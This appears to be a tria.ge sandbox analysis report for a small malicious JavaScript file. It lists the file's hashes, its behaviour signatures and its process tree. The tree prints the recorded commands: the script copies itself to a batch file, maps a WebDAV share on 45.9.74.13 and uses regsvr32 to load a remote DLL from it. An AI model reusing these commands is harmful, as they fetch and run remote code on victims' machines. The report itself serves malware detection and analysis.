Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09/07/2024, 05:58
Static task
static1
Behavioral task
behavioral1
Sample
2035815001653724469.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2035815001653724469.js
Resource
win10v2004-20240704-en
General
-
Target
2035815001653724469.js
-
Size
5KB
-
MD5
770f45a1e4733444a42eb7d7d3a87981
-
SHA1
b6dc3b63d358eb911494ec3a6899ec1a34ca3a64
-
SHA256
79f047e7fe22c18d409498ea601c2dac3022d58e8539636d36b94f70e1a82ec7
-
SHA512
dcc59b0944f1117efdc1510fa36e71e039532a143276a69673b36a2c4724aa1408d754bbd64ac4bcff85a1807e808e4c4f1f683c00e8667e42855b0569984ec3
-
SSDEEP
96:O4CeNKhGUpMeEpMkjozmDpZPqY/6mlhsmlA2pmlh1QMOm5k2MOmE:ZKFW7hwCRmPBkHc
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 5004 wrote to memory of 1284 5004 wscript.exe 82 PID 5004 wrote to memory of 1284 5004 wscript.exe 82 PID 1284 wrote to memory of 3800 1284 cmd.exe 87 PID 1284 wrote to memory of 3800 1284 cmd.exe 87 PID 1284 wrote to memory of 3220 1284 cmd.exe 88 PID 1284 wrote to memory of 3220 1284 cmd.exe 88
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2035815001653724469.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2035815001653724469.js" "C:\Users\Admin\\wqhjmm.bat" && "C:\Users\Admin\\wqhjmm.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:3800
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\701.dll3⤵PID:3220
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5770f45a1e4733444a42eb7d7d3a87981
SHA1b6dc3b63d358eb911494ec3a6899ec1a34ca3a64
SHA25679f047e7fe22c18d409498ea601c2dac3022d58e8539636d36b94f70e1a82ec7
SHA512dcc59b0944f1117efdc1510fa36e71e039532a143276a69673b36a2c4724aa1408d754bbd64ac4bcff85a1807e808e4c4f1f683c00e8667e42855b0569984ec3